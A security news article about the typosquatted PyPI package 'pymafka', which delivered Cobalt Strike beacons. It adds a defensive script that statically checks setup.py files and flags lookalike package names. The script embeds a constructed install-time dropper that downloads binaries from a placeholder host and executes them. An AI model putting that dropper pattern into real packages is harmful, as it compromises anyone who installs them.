Malicious 'pymafka' Package Spreads Cobalt Strike Beacons via PyPI
A malicious Python package, 'pymafka', has been discovered on the PyPI registry. It is a typosquat of the legitimate 'PyKafka' library, which has been downloaded over 4 million times. The package was used to deliver Cobalt Strike beacons and was downloaded around 300 times before its removal.
The 'pymafka' package contains a 'setup.py' script that runs at install time, checks the host operating system, and then downloads and executes a Cobalt Strike beacon built for that platform. On Windows, the beacon is dropped at 'C:\Users\Public\iexplorer.exe', a filename chosen to resemble the legitimate 'iexplore.exe' process. The beacon attempts to contact the China-based IP 39.106.227[.]92, assigned to Alibaba (Alisoft).
The malicious executables 'win.exe' (Windows) and 'MacOS' (macOS) are downloaded from 141.164.58[.]147, an IP address hosted by Vultr. The package was discovered by Sonatype's automated malware detection bots and taken down after Sonatype reported it to PyPI, preventing further downloads; it has also been analyzed by Moonlock Lab, the cybersecurity division of MacPaw.
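The install-time dropper pattern described above (branch on the platform, fetch a payload, hand it to the OS) can be triaged statically before a package is ever installed. The script below is an added example, not code from the article or from the pymafka package: it parses a setup.py with the standard-library ast module, resolves import aliases, flags a network fetch combined with a process launch, records platform probes and embedded URLs, and separately checks a requested package name against a small list of well-known names for typosquat similarity. The embedded setup.py, the 203.0.113.5 address and the KNOWN_PACKAGES list are constructed for this demonstration only.

```python
import ast
import difflib

# Install-time behaviours worth flagging in a setup.py: pull something from the
# network, then hand it to the OS to run, usually after branching on the platform.
NETWORK_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post", "http.client.HTTPConnection",
}
EXEC_CALLS = {
    "subprocess.Popen", "subprocess.run", "subprocess.call",
    "subprocess.check_output", "os.system", "os.popen", "os.startfile",
}
PLATFORM_PROBES = {"platform.system", "sys.platform", "os.name"}

# Assumed list of legitimate names to compare against (not a registry lookup).
KNOWN_PACKAGES = ["pykafka", "kafka-python", "confluent-kafka", "requests"]

# Constructed stand-in for a dropper-style setup.py, written for this example;
# it is NOT the real pymafka code, and 203.0.113.5 is a documentation address.
SAMPLE_SETUP_PY = r'''
import platform, subprocess
from urllib.request import urlretrieve as fetch
from setuptools import setup

if platform.system() == "Windows":
    url, dest = "http://203.0.113.5/win.exe", r"C:\Users\Public\iexplorer.exe"
elif platform.system() == "Darwin":
    url, dest = "http://203.0.113.5/MacOS", "/tmp/MacOS"
else:
    url, dest = "http://203.0.113.5/linux", "/tmp/linux"

fetch(url, dest)
subprocess.Popen([dest])

setup(name="pymafka", version="1.0")
'''


def _import_aliases(tree):
    """Map local names to the fully qualified name they were imported as."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom):
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module or ''}.{a.name}".lstrip(".")
    return aliases


def _dotted_name(node, aliases):
    """Return 'pkg.mod.attr' for a Name/Attribute chain, resolving import aliases."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def analyze_setup_py(source):
    """Static triage of a setup.py: returns findings and a verdict, never executes it."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    findings = {"network": [], "exec": [], "platform": [], "urls": []}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func, aliases)
            if name in NETWORK_CALLS:
                findings["network"].append((name, node.lineno))
            elif name in EXEC_CALLS:
                findings["exec"].append((name, node.lineno))
        elif isinstance(node, ast.Attribute):
            # platform.system() and sys.platform both surface here as attribute chains
            name = _dotted_name(node, aliases)
            if name in PLATFORM_PROBES:
                findings["platform"].append((name, node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith(("http://", "https://")):
                findings["urls"].append(node.value)
    # Download plus execution at install time is the dropper signature.
    findings["verdict"] = "suspicious" if findings["network"] and findings["exec"] else "clean"
    return findings


def typosquat_candidates(name, known=KNOWN_PACKAGES, threshold=0.8):
    """Well-known package names that the requested name is suspiciously close to."""
    target = name.lower()
    return [k for k in known
            if k.lower() != target
            and difflib.SequenceMatcher(None, target, k.lower()).ratio() >= threshold]


if __name__ == "__main__":
    report = analyze_setup_py(SAMPLE_SETUP_PY)
    print(report["verdict"], report["network"], report["exec"], report["urls"])
    print("pymafka resembles:", typosquat_candidates("pymafka"))
```

This is a triage heuristic, not a sandbox: it catches the plain download-then-execute shape but not payloads hidden behind exec() of decoded strings, so treat a "clean" verdict as a reason to look further rather than a clearance. Running it against the sdist before installing is the point, since the install itself is the trigger.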
The 'pymafka' package has been removed from PyPI. Because the payload is launched from 'setup.py', installing the package from its source distribution is enough to be compromised; the library never has to be imported or used. Users are advised to check package names carefully before installing, pin dependencies to known-good names and versions, and install only from trusted sources. The investigation into the creators of 'pymafka' is ongoing.